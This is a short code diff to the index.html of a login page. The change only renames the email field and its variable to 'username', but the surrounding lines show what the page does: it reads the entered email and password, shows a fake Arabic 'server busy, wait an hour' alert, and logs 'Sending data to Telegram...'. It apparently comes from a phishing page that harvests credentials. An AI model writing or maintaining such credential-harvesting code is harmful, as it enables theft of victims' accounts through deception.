--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
             <h2>Login</h2>
             <form id="login-form">
                 <div class="user-box">
-                    <input type="email" id="email" required>
+                    <input type="email" id="username" required>
                     <label>Email</label>
                 </div>
                 <div class="user-box">
@@ -36,7 +36,7 @@
             alert('عليك الانتظار ساعة بسبب الضغط على خادمنا');
 
             // الحصول على البريد الإلكتروني وكلمة المرور المدخلة
-            const email = document.getElementById('email').value;
+            const username = document.getElementById('username').value;
             const password = document.getElementById('password').value;
 
             console.log("Sending data to Telegram...");
